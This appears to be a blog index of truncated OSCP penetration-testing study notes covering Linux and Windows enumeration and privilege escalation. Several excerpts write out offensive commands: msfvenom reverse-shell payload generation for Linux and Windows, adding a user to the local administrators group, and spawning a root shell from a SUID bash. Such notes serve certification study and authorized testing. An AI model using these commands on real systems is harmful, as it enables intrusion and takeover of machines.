Table of Contents Linux Enumeration Windows Enumeration Privilege Escalation Techniques Linux Privesc Techniques Windows Provesc Techniques Tips and tricks SSH tunneling, Proxy and more

Read More

OSCP Notes Tools Linux Smart Enumeration https://github.com/diego-treitos/linux-smart-enumeration LinEnum https://github.com/rebootuser/LinEnum Notes: This allows to also search for passwords in files, also can export interesting files for further analysis Linux Priv Checker …

Read More

OSCP Notes Tools for enumeration PowerUp (https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1) sharpUp (https://github.com/GhostPack/SharpUp) - Useful when powershell is not available sharpUp - Pre-compiled …

Read More

OSCP Notes Find executable files with suid or sgid bit set Example: If you have /bin/bash with such permissions, you could easily spawn a root shell with -p option msfvenom command to generate executable elf file for reverse shell 1$msfvenom -p linux/x86/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf …

Read More

OSCP Notes msfvenom to spawn rev shell on windows - #msfvenom -p windows/x64/shell_reverse_tcp LHOST=<your host> LPORT=<your port> -f exe -o revshell.exe Adding user to Admin group - net localgroup administrators <username> /add PsExec tool - to escalate from admin user to full SYSTEM privs - …

Read More

Notes SMB enumeration - https://0xdf.gitlab.io/2018/12/02/pwk-notes-smb-enumeration-checklist-update1.html Scripts Threader3000, a light weight port scanner script. Online Tools Pentest.ws https://pentest.ws/tools/venom-builder https://pentest.ws/tools/shells https://pentest.ws/tools/cyberchef Reporting …

Read More

OSCP Notes Best Practices Always put an /etc/hosts entry for the servers you are working on, especially with the webapps so that you can explore vhosts. Its a good practice to search for all files under - find /home -type f -printf "%f\t%p\t%u\t%g\t%m" , followed by suid binary search - find / -perm -4000 …

Read More

Read More